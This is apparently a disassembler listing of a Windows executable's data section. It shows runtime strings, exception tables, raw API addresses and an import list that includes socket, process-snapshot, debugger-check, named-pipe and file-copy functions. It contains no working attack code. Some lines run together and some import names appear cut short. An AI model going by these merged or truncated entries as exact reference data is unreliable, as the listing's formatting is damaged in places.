dword_4372E4 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_428DF8+B5�r
dword_4372E8 dd 71AB46C9h ; resolved to->WS2_32.getsockoptdword_4372EC dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_4372F0 dd 71AB2BC0h ; resolved to->WS2_32.ntohl align 8
dword_4372F8 dd 76D6B096h ; resolved to->IPHLPAPI.GetUdpTable align 10h
flt_437300 dd 5.0e-1 ; DATA XREF: sub_405C99+509�r
align 8
dword_437308 dd 0FFFFFFFFh, 40A55Ah, 40A58Bh, 0dword_437318 dd 0FFFFFFFFh, 40A5F9h, 40A5FDh, 0dbl_437328 dq 9.765625e-4 ; DATA XREF: sub_4182BA+223�r
; sub_4182BA+238�r ...
dword_437330 dd 10h ; sub_40A9FE+621�r ...
off_437334 dd offset sub_41962B ; DATA XREF: sub_419617+4�o
; sub_419647+F�o ...
dword_437338 dd 2 dup(0) ; sub_41B420+57�o ...
dbl_437340 dq -3.0517578125e-5 ; DATA XREF: sub_41E415+1F�r
flt_437348 dd 9.765625e-4 ; DATA XREF: sub_425E18+1B5�r
flt_43734C dd 8.0 ; DATA XREF: sub_425E18+1AF�r
flt_437350 dd 0.0 ; DATA XREF: sub_425E18+174�r
flt_437354 dd 1.0e-3 ; DATA XREF: sub_425E18+16B�r
dbl_437358 dq -1.52587890625e-4 ; DATA XREF: sub_426761+3DF�r
dbl_437360 dq 3.0517578125e-4 ; DATA XREF: sub_426761+3C0�r
dbl_437368 dq -3.0517578125e-4 ; DATA XREF: sub_426761+33E�r
; sub_426761+3A2�r
dbl_437370 dq 1.52587890625e-4 ; DATA XREF: sub_426761+279�r
dbl_437378 dq -1.739501953125e-3 ; DATA XREF: sub_426761+254�r
; sub_426761+2DD�r ...
dbl_437380 dq 3.143310546875e-3 ; DATA XREF: sub_426761+ED�r
dbl_437388 dq 3.0517578125e-5 ; DATA XREF: sub_426761+BA�r
; sub_426761+143�r ...
dbl_437390 dq 6.103515625e-5 ; DATA XREF: sub_426761+9F�r
; sub_426761+309�r
dbl_437398 dq 2.288818359375e-3 ; DATA XREF: sub_426761+2E�r
dd offset dword_437FB8
off_4373A4 dd offset loc_42918F ; DATA XREF: sub_4290DB+4D�o
; sub_4291AB+C�o
dd offset sub_41B2AF
dd offset sub_429172
aStringTooLong db 'string too long',0 ; DATA XREF: sub_4290DB+1E�o
dd offset dword_437FF0
off_4373C4 dd offset loc_41B316 ; DATA XREF: sub_41B24F+4A�o
; sub_41B2D9+11�o ...
dd offset sub_41B2AF
dd offset sub_41B2BC
dd offset dword_438040
off_4373D4 dd offset loc_41B3E4 ; DATA XREF: sub_41B1F5+4D�o
; sub_41B400+C�o ...
dd offset sub_41B2AF
dd offset sub_41B3C7
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_4291C3+1E�o
dd offset dword_438088
off_4373FC dd offset sub_429325 ; DATA XREF: sub_4292F3+12�o
; .text:0042935A�o ...
dword_437400 dd 0FFFFFFFFh, 0 dd offset sub_42985D
dd 0FFFFFFFFh, 0
dd offset sub_4298B9
dword_437418 dd 0FFFFFFFFh, 0 dd offset sub_42995C
dd 0FFFFFFFFh, 0
dd offset sub_4299B4
dbl_437430 dq 1.0 ; DATA XREF: sub_42A706+6C�r
; sub_43067A+2A�r
dword_437438 dd 0FFFFFFFFh, 42AC6Ch, 42AC80hdword_437444 dd 6D6D6F63h, 2E646E61h, 6D6F63hdword_437450 dd 632Fh aComspec db 'COMSPEC',0 ; DATA XREF: sub_42B0E9+8�o
align 10h
dword_437460 dd 0FFFFFFFFh, 0 dd offset sub_42B42E
dd 0FFFFFFFFh, 0
dd offset sub_42B4B7
dword_437478 dd 0E06D7363h, 1, 2 dup(0) dd 3, 19930520h, 2 dup(0)
dd offset dword_4380B8
off_43749C dd offset sub_42B978 ; DATA XREF: sub_42B994+8�o
; sub_42B9D1+8�o ...
dd offset sub_42BA31
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_42BA31+7�o
align 4
dd offset dword_438100
off_4374BC dd offset loc_42BA67 ; DATA XREF: sub_42BA3E+5�o
; .text:off_447384�o ...
dword_4374C0 dd 0FFFFFFFFh, 42C65Dh, 42C671ha__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_42C70D+8E�o
align 4
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_42C70D+4F�o
align 4
byte_4374FC db 6 ; DATA XREF: sub_42DC7D:loc_42DCD4�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: .text:off_45323C�o
unicode 0, <(null)>,0
align 4
aNull_0 db '(null)',0 ; DATA XREF: .text:off_453238�o
align 10h
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAtan db 'atan',0
align 4
aAcos db 'acos',0
align 10h
aAsin db 'asin',0
align 4
aTanh db 'tanh',0
align 10h
aCosh db 'cosh',0
align 4
aSinh db 'sinh',0
align 10h
aLog10 db 'log10',0
align 4
dd offset dword_676F6C
dd 776F70h
dword_437620 dd 707865h, 0 dbl_437628 dq 0.0 ; DATA XREF: sub_42FF67+8C�r
; sub_42FF67+AC�r ...
dbl_437630 dq 4.195835e6 ; DATA XREF: sub_43067A+F�r
dbl_437638 dq 3.145727e6 ; DATA XREF: sub_43067A+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_4306B8+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_4306B8�o
align 4
aE000 db 'e+000',0 ; DATA XREF: sub_430840+57�o
align 10h
dword_437670 dd 2 dup(0) ; sub_4334DD+39�o ...
dword_437678 dd 0FFFFFFFFh, 430EAFh, 430EB3h, 0FFFFFFFFh, 430F63h, 430F67h
; DATA XREF: sub_430D9F+5�o
aPath db 'PATH',0 ; DATA XREF: sub_430FC3+49�o
align 4
a_com db '.com',0 ; DATA XREF: .text:off_4538CC�o
align 10h
a_exe db '.exe',0 ; DATA XREF: .text:004538C8�o
align 4
a_bat db '.bat',0 ; DATA XREF: .text:004538C4�o
align 10h
a_cmd db '.cmd',0 ; DATA XREF: .text:off_4538C0�o
align 4
a__0 db '.\',0 ; DATA XREF: sub_431128+51�o
align 10h
dword_4376C0 dd 0FFFFFFFFh, 43171Ch, 431726h, 0dword_4376D0 dd 0FFFFFFFFh, 0 dd offset loc_4318AB
align 10h
dd offset sub_431889
dd offset sub_431893
dword_4376E8 dd 0FFFFFFFFh, 431AE1h, 431AE5h, 0dword_4376F8 dd 0FFFFFFFFh, 431B43h, 431B4Ch, 0dword_437708 dd 0FFFFFFFFh, 0 dd offset loc_431C28
align 8
dd offset loc_431C14
dd offset loc_431C18
dword_437720 dd 0FFFFFFFFh, 0 dd offset loc_431C7E
align 10h
dd offset loc_431C6A
dd offset loc_431C6E
dword_437738 dd 0FFFFFFFFh, 0 dd offset sub_431E06
dd 0FFFFFFFFh, 0
dd offset sub_431F56
dword_437750 dd 0FFFFFFFFh, 0 dd offset sub_432019
dd 0FFFFFFFFh, 0
dd offset sub_432094
aIllegalByteSeq db 'Illegal byte sequence',0 ; DATA XREF: .text:0045398C�o
align 10h
aDirectoryNotEm db 'Directory not empty',0 ; DATA XREF: .text:00453988�o
aFunctionNotImp db 'Function not implemented',0 ; DATA XREF: .text:00453984�o
align 10h
aNoLocksAvailab db 'No locks available',0 ; DATA XREF: .text:00453980�o
align 4
aFilenameTooLon db 'Filename too long',0 ; DATA XREF: .text:0045397C�o
align 4
aResourceDeadlo db 'Resource deadlock avoided',0 ; DATA XREF: .text:00453974�o
align 4
aResultTooLarge db 'Result too large',0 ; DATA XREF: .text:0045396C�o
align 4
aDomainError db 'Domain error',0 ; DATA XREF: .text:00453968�o
align 4
aBrokenPipe db 'Broken pipe',0 ; DATA XREF: .text:00453964�o
aTooManyLinks db 'Too many links',0 ; DATA XREF: .text:00453960�o
align 4
aReadOnlyFileSy db 'Read-only file system',0 ; DATA XREF: .text:0045395C�o
align 4
aInvalidSeek db 'Invalid seek',0 ; DATA XREF: .text:00453958�o
align 4
aNoSpaceLeftOnD db 'No space left on device',0 ; DATA XREF: .text:00453954�o
aFileTooLarge db 'File too large',0 ; DATA XREF: .text:00453950�o
align 4
aInappropriateI db 'Inappropriate I/O control operation',0 ; DATA XREF: .text:00453948�o
aTooManyOpenFil db 'Too many open files',0 ; DATA XREF: .text:00453944�o
aTooManyOpenF_0 db 'Too many open files in system',0 ; DATA XREF: .text:00453940�o
align 4
aInvalidArgumen db 'Invalid argument',0 ; DATA XREF: .text:0045393C�o
align 10h
aIsADirectory db 'Is a directory',0 ; DATA XREF: .text:00453938�o
align 10h
aNotADirectory db 'Not a directory',0 ; DATA XREF: .text:00453934�o
aNoSuchDevice db 'No such device',0 ; DATA XREF: .text:00453930�o
align 10h
aImproperLink db 'Improper link',0 ; DATA XREF: .text:0045392C�o
align 10h
aFileExists db 'File exists',0 ; DATA XREF: .text:00453928�o
aResourceDevice db 'Resource device',0 ; DATA XREF: .text:00453924�o
aUnknownError db 'Unknown error',0 ; DATA XREF: .text:00453920�o
; .text:0045394C�o ...
align 4
aBadAddress db 'Bad address',0 ; DATA XREF: .text:0045391C�o
aPermissionDeni db 'Permission denied',0 ; DATA XREF: .text:00453918�o
align 4
aNotEnoughSpace db 'Not enough space',0 ; DATA XREF: .text:00453914�o
align 10h
aResourceTempor db 'Resource temporarily unavailable',0 ; DATA XREF: .text:00453910�o
align 4
aNoChildProcess db 'No child processes',0 ; DATA XREF: .text:0045390C�o
align 4
aBadFileDescrip db 'Bad file descriptor',0 ; DATA XREF: .text:00453908�o
aExecFormatErro db 'Exec format error',0 ; DATA XREF: .text:00453904�o
align 10h
aArgListTooLong db 'Arg list too long',0 ; DATA XREF: .text:00453900�o
align 4
aNoSuchDeviceOr db 'No such device or address',0 ; DATA XREF: .text:004538FC�o
align 10h
aInputOutputErr db 'Input/output error',0 ; DATA XREF: .text:004538F8�o
align 4
aInterruptedFun db 'Interrupted function call',0 ; DATA XREF: .text:004538F4�o
align 10h
aNoSuchProcess db 'No such process',0 ; DATA XREF: .text:004538F0�o
aNoSuchFileOrDi db 'No such file or directory',0 ; DATA XREF: .text:004538EC�o
align 4
aOperationNotPe db 'Operation not permitted',0 ; DATA XREF: .text:004538E8�o
aNoError db 'No error',0 ; DATA XREF: .text:off_4538E4�o
align 10h
aRuntimeError db 'runtime error ',0
align 10h
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 10h
aSingError db 'SING error',0Dh,0Ah,0
align 10h
aDomainError_0 db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_453A94�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4330A0+119�o
align 10h
asc_437D50 db 0Ah ; DATA XREF: sub_4330A0+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4330A0+D3�o
db 0Ah
db 'Program: ',0
align 10h
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4330A0+7D�o
align 4
dword_437D88 dd 0FFFFFFFFh, 4335D6h, 4335DAhaSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_4339B6+2A�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_434D70+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_434D70+35�o
aHMmSs db 'H:mm:ss',0
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0
aMDYy db 'M/d/yy',0
align 10h
aDecember db 'December',0
align 4
aNovember db 'November',0
align 4
aOctober db 'October',0
aSeptember db 'September',0
align 4
aAugust db 'August',0
align 4
aJuly db 'July',0
align 4
aJune db 'June',0
align 4
aApril db 'April',0
align 4
aMarch db 'March',0
align 4
aFebruary db 'February',0
align 10h
aJanuary db 'January',0
dd offset dword_636544
dd 766F4Eh, 74634Fh, 706553h, 677541h, 6C754Ah, 6E754Ah
dd 79614Dh, 727041h, 72614Dh, 626546h, 6E614Ah, 75746153h
dd 79616472h, 0
aFriday db 'Friday',0
align 4
aThursday db 'Thursday',0
align 4
aWednesday db 'Wednesday',0
align 4
aTuesday db 'Tuesday',0
aMonday db 'Monday',0
align 4
aSunday db 'Sunday',0
align 4
aSat db 'Sat',0
aFri db 'Fri',0
aThu db 'Thu',0
dd offset byte_646557
dd offset dword_657554
dd 6E6F4Dh, 6E7553h
dword_437F18 dd 4E512331h, 4E41hdword_437F20 dd 4E492331h, 46hdword_437F28 dd 4E492331h, 44hdword_437F30 dd 4E532331h, 4E41hdword_437F38 dd 0FFFFFFFFh, 435C9Ch, 435CA0h, 0FFFFFFFFh, 435D0Bh, 435D0Fh
; DATA XREF: sub_435AE5+5�o
dd 447384h, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_437F68 dd offset off_44739C ; DATA XREF: .text:00437F9C�o
; .text:00437FD0�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
off_437F80 dd offset off_450E00 ; DATA XREF: .text:00437F98�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_437F80
dd offset off_437F68
dd offset dword_437F38+18h
dd 0
db 0 ; DATA XREF: .text:00437FC8�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 437F98h
dword_437FB8 dd 3 dup(0) dd offset off_450E00
dd offset unk_437FA8
align 10h
dd offset off_437F68
dd offset dword_437F38+18h
dword_437FD8 dd 4 dup(0) dd 2, 437FD0h
dword_437FF0 dd 3 dup(0) dd offset off_44739C
dd offset dword_437FD8+8
align 8
off_438008 dd offset off_4473BC ; DATA XREF: .text:00438020�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_438008
dd offset off_437F68
dd offset dword_437F38+18h
dword_43802C dd 3 dup(0) dd 3, 438020h
dword_438040 dd 3 dup(0) dd offset off_4473BC
dd offset dword_43802C+4
align 8
off_438058 dd offset off_450E30 ; DATA XREF: .text:00438070�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_438058
dd 0
db 0 ; DATA XREF: .text:00438098�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 438070h
dword_438088 dd 3 dup(0) dd offset off_450E30
dd offset unk_438078
dd offset dword_437F38+18h
dword_4380A0 dd 4 dup(0) dd 1, 43809Ch
dword_4380B8 dd 3 dup(0) dd offset off_447384
dd offset dword_4380A0+8
align 10h
off_4380D0 dd offset off_450EA0 ; DATA XREF: .text:004380E8�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4380D0
dword_4380EC dd 3 dup(0) dd 1, 4380E8h
dword_438100 dd 3 dup(0) dd offset off_450EA0
dd offset dword_4380EC+4
align 8
dd 0FFFFFFFFh, 436308h
dword_438120 dd 19930520h, 1, 438118h, 4 dup(0) dd 0FFFFFFFFh, 43631Ch
dword_438144 dd 19930520h, 1, 43813Ch, 4 dup(0) dd 0FFFFFFFFh, 436340h, 0
dd offset loc_436330
dd 1, 436338h
dword_438178 dd 19930520h, 3, 438160h, 4 dup(0) dd 0FFFFFFFFh, 436364h
dword_43819C dd 19930520h, 1, 438194h, 4 dup(0) dd 0FFFFFFFFh, 436378h, 0
dd offset loc_436380
dd 0
dd offset loc_436388
dd 0
dd offset loc_436390
dd 3, 436398h, 4, 4363A0h, 0
dd offset loc_4363A8
dd 6, 4363B0h, 0
dd offset loc_4363B8
dd 8, 4363C0h, 9, 4363C8h, 0
dd offset loc_4363D0
dd 0Bh, 4363D8h, 0Ch, 4363E0h, 0
dd offset loc_4363E8
dd 0Eh, 4363F0h, 0
dd offset loc_4363F8
dd 0
dd offset loc_436400
dd 11h, 436408h, 11h, 436410h
dword_438258 dd 19930520h, 14h, 4381B8h, 4 dup(0) dd 0FFFFFFFFh, 436424h, 0
dd offset loc_43642F
dd 1, 436437h, 2, 43643Fh, 3, 43644Ah, 4, 436455h, 5, 436460h
dd 6, 436468h, 7, 436473h, 8, 43647Bh, 8, 436486h, 8, 436491h
dd 7, 43649Ch, 0Ch, 4364A7h, 7, 4364A7h, 0Eh, 4364B2h
dd 0Fh, 4364BDh, 0Eh, 4364C8h, 11h, 4364D3h, 0Eh, 4364D3h
dd 13h, 4364DEh, 7, 4364E9h, 15h, 4364F4h, 7, 4364F4h
dd 17h, 4364FFh, 18h, 43650Ah, 17h, 436515h, 1Ah, 436520h
dd 17h, 436520h, 1Ch, 43652Bh, 7, 436536h, 1Eh, 436541h
dd 7, 436541h, 20h, 43654Ch, 21h, 436557h, 20h, 436562h
dd 23h, 43656Dh, 20h, 43656Dh, 25h, 436578h, 7, 436583h
dd 27h, 43658Eh, 7, 43658Eh, 29h, 436599h, 2Ah, 4365A4h
dd 29h, 4365AFh, 2Ch, 4365BAh, 29h, 4365BAh, 2Eh, 4365C5h
dword_4383F4 dd 19930520h, 30h, 438274h, 5 dup(0) dd offset off_447384
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 42B9D1h, 0
dd offset off_44739C
align 8
dd 0FFFFFFFFh, 0
dd 1Ch, 41B332h, 0
dd offset off_4473BC
dd 0
dd 0FFFFFFFFh, 0
dword_43845C dd 1Ch, 41B400h, 3, 438448h, 43842Ch, 438410hdword_438474 dd 0 ; sub_41B3C7+12�o ...
dd offset sub_41B38A
align 10h
dd offset dword_43845C+8
dd 0FFFFFFFFh, 4365DCh
dword_43848C dd 19930520h, 1, 438484h, 4 dup(0) dd 0FFFFFFFFh, 4365F0h
dword_4384B0 dd 19930520h, 1, 4384A8h, 4 dup(0)dword_4384CC dd 2, 43842Ch, 438410hdword_4384D8 dd 0 dd offset sub_41B2D9
dd 0
dd offset dword_4384CC
dd 0FFFFFFFFh, 436604h
dword_4384F0 dd 19930520h, 1, 4384E8h, 4 dup(0) dd 0FFFFFFFFh, 436618h
dword_438514 dd 19930520h, 1, 43850Ch, 4 dup(0) dd 0FFFFFFFFh, 43662Ch
dword_438538 dd 19930520h, 1, 438530h, 4 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
dd offset loc_41B851
dd 2 dup(0)
dd 2 dup(1), 438564h
dword_438588 dd 19930520h, 2, 438554h, 1, 438574h, 2 dup(0)
; DATA XREF: .text:loc_436640�o
dd 0FFFFFFFFh, 43664Ch
dword_4385AC dd 19930520h, 1, 4385A4h, 4 dup(0) dd 0FFFFFFFFh, 436660h, 0
dd offset loc_436668
dd 1, 436670h, 2, 436678h
dword_4385E8 dd 19930520h, 4, 4385C8h, 6 dup(0) dd offset off_450E00
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 4291ABh, 0
dword_438628 dd 3, 438608h, 43842Ch, 438410hdword_438638 dd 0 ; sub_429172+12�o
dd offset sub_429135
dd 0
dd offset dword_438628
dword_438648 dd 19930520h, 1, 438668h, 5 dup(0) dd 0FFFFFFFFh, 43668Ch
dword_438670 dd 19930520h, 1, 438690h, 5 dup(0) dd 0FFFFFFFFh, 4366A0h
dword_438698 dd 19930520h, 1, 4386B8h, 5 dup(0) dd 0FFFFFFFFh, 4366B4h, 0
dd offset off_450E30
dd 0
dd 0FFFFFFFFh, 0
dd 10h, 429341h, 0
dword_4386E0 dd 1, 4386C0h dword_4386E8 dd 0 dd offset sub_42936E
dd 0
dd offset dword_4386E0
dd 387F0h, 2 dup(0)
dd 3909Ch, 37030h, 38A28h, 2 dup(0)
dd 390FAh, 37268h, 387C0h, 2 dup(0)
dd 391D6h, 37000h, 38A1Ch, 2 dup(0)
dd 3920Eh, 3725Ch, 38A48h, 2 dup(0)
dd 39228h, 37288h, 38A0Ch, 2 dup(0)
dd 3924Ah, 3724Ch, 38AB8h, 2 dup(0)
dd 39260h, 372F8h, 38A40h, 2 dup(0)
dd 3928Ah, 37280h, 38A14h, 2 dup(0)
dd 39618h, 37254h, 5 dup(0)
dd 77DD6BF0h, 77DD761Bh, 77DDEBE7h, 77DFD4C9h, 77DD7753h
dd 77DFD11Bh, 77DFC534h, 77DF08D5h, 77E215D9h, 77DF087Fh
dd 77DD7883h, 0
dd 7C80ADA0h, 7C801D77h, 7C80ABDEh, 7C80992Fh, 7C80B905h
dd 7C809B47h, 7C80B974h, 7C80DDF5h, 7C812ADEh, 7C81CE03h
dd 7C8312E5h, 7C801A24h, 7C831EABh, 7C8286EEh, 7C812782h
dd 7C81153Ch, 7C80B6A1h, 7C80A0D4h, 7C810D87h, 7C802520h
dd 7C8308ADh, 7C80180Eh, 7C80BDB6h, 7C8217ACh, 7C834D41h
dd 7C8214E3h, 7C82C2D3h, 7C8216A4h, 7C8643B5h, 7C864230h
dd 7C864B0Fh, 7C809920h, 7C813093h, 7C80BE01h, 7C835DCAh
dd 7C810B8Eh, 7C810A77h, 7C835E8Fh, 7C80945Ch, 7C901005h
dd 7C80A427h, 7C81CDDAh, 7C802367h, 7C8024A7h, 7C80E93Fh
dd 7C83039Bh, 7C81F992h, 7C83632Dh, 7C8361EEh, 7C814EEAh
dd 7C80D262h, 7C830D74h, 7C81AE17h, 7C85F90Fh, 7C80DDFEh
dd 7C81E0C7h, 7C8021CCh, 7C8309E1h, 7C801E16h, 7C863F58h
dd 7C863DE5h, 7C8098EBh, 7C80998Dh, 7C810111h, 7C831CB8h
dd 7C831C45h, 7C821363h, 7C80A7D4h, 7C80EDD7h, 7C834EB1h
dd 7C8137D9h, 7C85B219h, 7C812D9Fh, 7C809728h, 7C809EF1h
dd 7C809E79h, 7C9179FDh, 7C9010EDh, 7C91188Ah, 7C80B829h
dd 7C910331h, 7C80C058h, 7C80BAA1h, 7C80B4CFh, 7C810637h
dd 7C809BF8h, 7C80929Ch, 7C82FA46h, 7C802442h, 7C809A51h
dd 7C809AE4h, 7C833478h, 7C80A35Eh, 7C80D077h, 7C832044h
dd 7C80BCCFh, 7C809E01h, 7C812641h, 7C80A490h, 7C838A0Ch
dd 7C812F08h, 7C81CF5Bh, 7C814AE7h, 7C81DF77h, 7C8127A7h
dd 7C809915h, 7C812E76h, 7C81DC03h, 7C84467Dh, 7C9109EDh
dd 7C80CCA8h, 7C838DE8h, 7C862E2Ah, 7C810E51h, 7C812BB6h
dd 7C810EF8h, 7C812F39h, 7C80CC97h, 7C809740h, 7C910340h
dd 7C9105D4h, 7C91043Dh, 7C8350BFh, 7C80176Bh, 7C80977Ah
dd 7C809766h, 7C8328F7h, 7C809BC5h, 7C937A40h, 7C812A09h
dd 7C801EEEh, 7C812F1Dh, 7C8111DAh, 7C814AF2h, 0
dd 71B2517Fh, 0
dd 7712A63Fh, 0
dd 7CA40EE0h, 7CAB8CB2h, 0
dd 7E44F209h, 7E42E5C2h, 7E42F420h, 7E42F383h, 7E41A8ADh
dd 0
dd 76A08017h, 0
dd 71AC0BDEh, 71AB3EA1h, 71AB4519h, 71AB2C69h, 71AB3E00h
dd 71AB951Eh, 71AB88D3h, 71AB4FD4h, 71AB2B66h, 71AB4428h
dd 71AB2DC0h, 71AC1028h, 71AB664Dh, 71AB3B91h, 71AB2BF4h
dd 71AB2B66h, 71AB8769h, 71AB406Ah, 71AB428Ah, 71AB615Ah
dd 71AB9639h, 71AB94DCh, 71AB50C8h, 71AB2BC0h, 71AB46C9h
dd 71AB4544h, 71AB2BC0h, 0
dd 76D6B096h, 0
db 49h ; I
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0D5h ; Õ
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
aI db 'i',0
aCreatethread db 'CreateThread',0
align 2
dw 175h
aGetmodulefil_0 db 'GetModuleFileNameA',0
align 4
dd 736C03B6h, 6D637274h, 416970h, 784500B0h, 68547469h
dd 64616572h, 1690000h, 4C746547h, 45747361h, 726F7272h
dd 21A0000h
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
aZ db 'z',0
aDeletecritical db 'DeleteCriticalSection',0
dw 247h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aP_1 db '',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 10h
dd 6F4C0248h, 694C6461h, 72617262h, 4179h, 724600EFh, 694C6565h
dd 72617262h, 2520079h, 61636F4Ch, 6572466Ch, 25E0065h
dd 5670614Dh, 4F776569h, 6C694666h, 2E0065h, 736F6C43h
dd 6E614865h, 656C64h, 6E550365h, 5670616Dh, 4F776569h
dd 6C694666h, 13A0065h
aGetcurrentproc db 'GetCurrentProcess',0
dw 1DFh
aGetversionexa db 'GetVersionExA',0
dw 352h
aTerminatethrea db 'TerminateThread',0
db 5Bh ; [
db 3, 54h, 72h
aAnsactnamedpip db 'ansactNamedPipe',0
aM_1 db 'M',0
aCreatefilea db 'CreateFileA',0
db '|',0
aDeletefilea db 'DeleteFileA',0
db '=',0
aCopyfilea db 'CopyFileA',0
db 0Eh
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 156h
aGetfileattribu db 'GetFileAttributesA',0
align 4
db 77h ; w
db 1, 47h, 65h
aTmodulehandlea db 'tModuleHandleA',0
align 4
db 89h ; ‰
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 397h
aWritefile db 'WriteFile',0
dw 385h
aWaitforsingleo db 'WaitForSingleObject',0
aI_0 db 'I',0
aCreateeventa db 'CreateEventA',0
align 4
db 0ABh ; «
db 2, 52h, 65h
aAdfile db 'adFile',0
align 10h
db 0BFh ; ¿
db 3, 6Ch, 73h
aTrlena db 'trlenA',0
align 4
aE db 'E',0
aCreatedirector db 'CreateDirectoryA',0
align 10h
db 0B0h ; °
db 3, 6Ch, 73h
aTrcata db 'trcatA',0
align 4
db 4Bh ; K
db 1, 47h, 65h
aTdrivetypea db 'tDriveTypeA',0
db 6Eh ; n
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDriveStringsA',0
dw 10Ch
aGetcomputern_0 db 'GetComputerNameA',0
align 2
dw 262h
aModule32next db 'Module32Next',0
align 2
dw 260h
aModule32firs_0 db 'Module32First',0
db 'l',0
aCreatetoolhe_0 db 'CreateToolhelp32Snapshot',0
align 2
dw 13Bh
aGetcurrentpr_0 db 'GetCurrentProcessId',0
db 2Fh ; /
db 2, 49h, 73h
aDebuggerpresen db 'DebuggerPresent',0
db 0B9h ; ¹
db 3, 6Ch, 73h
aTrcpya db 'trcpyA',0
align 4
retf
; ---------------------------------------------------------------------------
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 4
db 10h
db 3, 53h, 65h
aTfilepointer db 'tFilePointer',0
align 2
dw 15Bh
aGetfilesize db 'GetFileSize',0
db 64h ; d
db 2, 4Dh, 6Fh
aVefilea db 'veFileA',0
aN db 'N',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 29Ah
aQueryperform_1 db 'QueryPerformanceFrequency',0
dw 299h
aQueryperform_2 db 'QueryPerformanceCounter',0
aP_2 db '¯',0
aExitprocess db 'ExitProcess',0
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 4
db 0B8h ; ¸
db 2, 52h, 65h
aLeasemutex db 'leaseMutex',0
align 4
aZ_0 db 'Z',0
aCreatemutexa db 'CreateMutexA',0
align 4
db 46h ; F
db 1, 47h, 65h
aTdiskfreespace db 'tDiskFreeSpaceExA',0
dw 1FBh
aGlobalmemoryst db 'GlobalMemoryStatusEx',0
align 2
